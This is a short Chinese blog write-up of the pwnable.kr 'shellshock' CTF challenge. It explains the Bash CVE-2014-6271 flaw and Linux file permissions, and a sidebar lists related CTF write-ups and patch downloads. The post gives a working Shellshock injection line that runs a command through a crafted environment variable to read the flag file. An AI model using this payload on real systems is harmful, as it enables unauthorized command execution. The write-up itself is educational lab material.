pwnable shellshock wp

最新推荐文章于 2022-05-09 21:50:43 发布
最新推荐文章于 2022-05-09 21:50:43 发布
阅读量224 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/moep0/article/details/83827540
版权

查看当前用户:whoami

groups 查看当前登录用户的组内成员

groups test 查看test用户所在的组,以及组内成员

考察知识点 CVE-2014-6271(破壳漏洞)

GNU Bash 4.3及之前版本在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行Shell命令。某些服务和应用允许未经身份验证的远程攻击者提供环境变量以利用此漏洞。此漏洞源于在调用Bash Shell之前可以用构造的值创建环境变量。这些变量可以包含代码,在Shell被调用后会被立即执行。

https://blog.csdn.net/tinyletero/article/details/40261593

 

http://www.cnblogs.com/snake-hand/p/3161511.html

 

env x='() { :;}; bash -c "cat flag" ' ./shellshock

 

第一列:drwxr-xr-x,d代表目录,-代表普通文件。开始3个字符rwx代表该文件的属主的权限,中间3个字符r-x代表该文件属主所在用户组的其他用户的权限,最后r-x代表其他用户的权限。(r-read w-write x-excute)

第二列:若是文件则代表该文件的硬链接数。若是目录,则代表该目录下的子目录数,其实default-host目录下并没有子目录,为什么会显示有2个子目录呢,因为任何目录都有2个子目录,当前目录(.)和子目录(..)。

第三列:当前文件所属的用户名,若该用户被删除,则会显示该用户删除前的用户id。

第四列:当前文件所属的用户组。

第五列:若是文件则代表该文件的大小,若是目录则代表该目录的大小(不包括目录下的子目录和文件的大小)。

第六列:该文件最近修改或者查看的时间。

第七列:文件名称。

最前面没有被截屏的total 980 表示一共大小为980k

 

运行./shellshock可以暂时提升用户组权限来打开flag(详见文章开头第二个链接)

 

moep0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pwnable_hacknote_WP
weixin_56434818的博客
03-01 752
pwnable_hacknote_WP 文章目录pwnable_hacknote_WP检查保护分析ELFAdd noteDelete notePrint note利用思路exp 检查保护 ​ i386架构,RELRO半开,开了Canary和NX,没开PIE。 分析ELF 先跑一下 类似菜单的程序,有增、删、查的操作。 IDA反编译后发现主函数主要就是根据选项选择菜单内相应功能的作用,若输入范围之外的数字则会出现错误提示并重新选择。(因为主函数逻辑不是很复杂所以这里就不贴反编译出来的代码了) Add no
pwnable-shellshock
网安星空
02-05 1406
pwnable.kr是一个经典的CTF中PWN方向练习的专业网站,本文记录的题目是shellshock,主要考察的是破壳漏洞的利用。
pwnable.kr之shellshock
river
05-04 1090
shellshock 登陆上服务器看到有shellshock文件,还有一个bash文件,执行./shellshock shellshock不是CVE-20146271吗? 根据搜到的结果进行测试: 正常执行过程分析 Bash有一种独有的使用环境变量来定义函数的方法。如果环境变量的值以字符”(){”开头,那么这个变量就会被当作是一个导
shellshocke - pwnable
SkYe's Blog
09-01 315
shellshocke - pwnable 题目 连接服务器:ssh shellshock@pwnable.kr -p2222 (pw:guest) shellshock源码: #include <stdio.h> int main(){ setresuid(getegid(), getegid(), getegid()); setresgid(getegid(), ...
pwnable.kr】 shellshock
think_ycx的专栏
10-06 418
  本关主要是考察shellshock漏洞。 ssh shellshock@pwnable.kr -p2222登陆后看一下权限: shellshock@ubuntu:~$ ls -al total 980 drwxr-x--- 5 root shellshock 4096 Oct 23 2016 . drwxr-xr-x 92 root root ...
shellshock
12-10
shellshock代码,网页形式,看起来不错,需要到可以试试哦。
shellshock 补丁 for rhel5.11 x64
10-08
shellshock 补丁 for rhel5.11 x64
TurboPower ShellShock-开源
07-01
ShellShock 提供了一组组件,让您可以使用 Windows Shell 和 Windows 资源管理器中提供的功能自定义应用程序,而无需编写代码。 这些组件是用原生 VCL 为 Borland Delphi 和 C++Builder 编写的。
shellshock补丁
10-20
破壳漏洞(shellshock)红帽4 X86(32位)补丁 内含: bash-3.0-27.0.3.el4.i386.rpm bash-debuginfo-3.0-27.el4.4.i386.rpm ------------------------------------------- 验证命令: env x='() { :;}; echo vulnerable'...
破壳漏洞(ShellShock)红帽最新补丁(29日上午更新)
09-29
从红帽更新服务器上下载下来的,里面包含 RedHat5 X86:bash-3.2-33.el5_11.4.i386.rpm RedHat5 X86_64:bash-3.2-33.el5_11.4.x86_64.rpm bash-debuginfo-3.2-33.el5_11.4.x86_64.rpm RedHat6 X86:bash-4.1.2-15.el6...
[WriteUp] pwnable.kr -- [shellshock]
qq_23026851的博客
07-31 470
题目: 解: 登录 检测是否存在shellshock漏洞: 上图有意思的地方在于,当输入“bash”时,没有触发shellshock漏洞;而“./bash”则触发了。究其原因,该服务器默认的bash程序没有shellshock漏洞,而当前目录下的这个vulnerable的“bash”是供我们练习专用的。 Shellshock的原理已经被探讨了很多,简单总结一下就是,当环境变量X被如此...
每日一题pwnable.kr shellshock
Kni9hT's Blog
09-04 355
Bash远程执行漏洞“破壳” [注:bash版本要在4.1以下] bash引自维基百科的描述为: "bash,Unix shell的一种。1989年发布第一个正式版本,原先是计划用在 GNU操作系统上,但能运行于大多数类Unix系统的操作系统之上,包括Linux与Mac OS X v10.4都将它作为默认shell。它也被移植到Microsoft Windows上的Cygwin与MinGW,或...
pwnable.kr-----解题过程】shellshock
lyuchen65的博客
09-16 1234
#include int main(){ setresuid(getegid(), getegid(), getegid()); setresgid(getegid(), getegid(), getegid()); system("/home/shellshock/bash -c 'echo shock_me'"); return 0; }根据题目一下子可以看出来这是shellshoc
pwnable.kr-bof WP
Casuall的博客
03-24 5413
pwnable.kr-bof   这道题是一个简单的缓冲器溢出的题,首先要做这道题要对函数调用栈有一定的了解。 函数调用栈是指程序运行时内存一段连续的区域,用来保存函数运行时的状态信息,包括函数参数与局部变量等。称之为“栈”是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶;在函数调用结束时,栈顶的函数(callee)状态被弹出,栈...
Pwnable.tw WP
AlexYoung28的博客
08-18 874
Pwnable.tw start 我们分析上图程序的汇编代码: 上图中的第一个方框,其实是将 : Let's start the CTF:  这句字符串压进栈; 第二个方框:其实是 system_write()函数, 参数中 fd =1, 说明是标准输出,也就是将 字符串打印输出在屏幕上; 第三个方框: 其实 标准输入函数,允许输入的长度是 3ch 也就是 60个字节; 但是buffe...
Pwnable.kr WP
AlexYoung28的博客
08-13 937
近期,开始将以前做的CTF的题目,全部整理一遍,写个WP,也是为了督促自己,还需要学的东西还有很多。 Pwnable.kr fd  我们首先看到这道题的C源码: 需要得到flag,则需要执行 system("/bin/cat flag"); 则 必须 buf = "LETMEWIN"。 read(fd, buf, 32)函数中的三个参数中: fd == 0时:则表示标准输入; ...
pwnable.kr-lotto WP
Casuall的博客
05-26 228
源码如下: #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> unsigned char submit[6]; void play(){ int i; printf("Submit your 6 lotto bytes : "); ...
pwnable[fd](WP)
m0_52249553的博客
05-09 205
文章目录题目简介保护措施源码分析程序利用流程解法 题目简介 关于read函数的一道程序题 保护措施 远程服务器好像不给我们访问flag的权限 源码分析 fd.c的源码如下 #include <stdio.h> #include <stdlib.h> #include <string.h> char buf[32]; int main(int argc, char* argv[], char* envp[]){ if(argc<2){
pwnable.kr BOF wp
moep0的博客
10-28 267
放到ida里面反编译一下 gets不要太明显(gets不会对输入的字符串长度进行判断) 这个时候我发现,原来有源码。。。 没关系,拿ida看一下overflowmw和key的位置 发现相差52个byte 第一次写exp,找了一份大佬的 运行一下 成功 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值